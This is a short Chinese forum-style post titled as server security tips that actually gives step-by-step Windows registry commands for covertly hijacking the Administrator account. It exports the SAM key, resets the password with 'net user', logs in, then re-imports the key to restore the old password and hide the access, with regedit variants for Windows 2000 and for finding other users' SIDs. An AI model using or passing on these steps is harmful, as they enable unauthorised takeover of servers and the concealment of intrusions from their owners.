服务器安全设置小技巧

1.
sa默认是SYSTEM权限，可以读sam键.
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\trace.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:\trace.reg
这样就不用克隆，用管理员帐户即可.

2.
如果没用默认的administrator，可以用下面的方法找到对应的sid.
regedit /e c:\test.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\用户名

3.
2000系统不存在REG，用Regedit更具有通用性
regedit /e c:\trace.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
regedit要写完整路径，不可以用HKLM代替HKEY_LOCAL_MACHINE
完事后用regedit /s c:\trace.reg恢复原来的键值。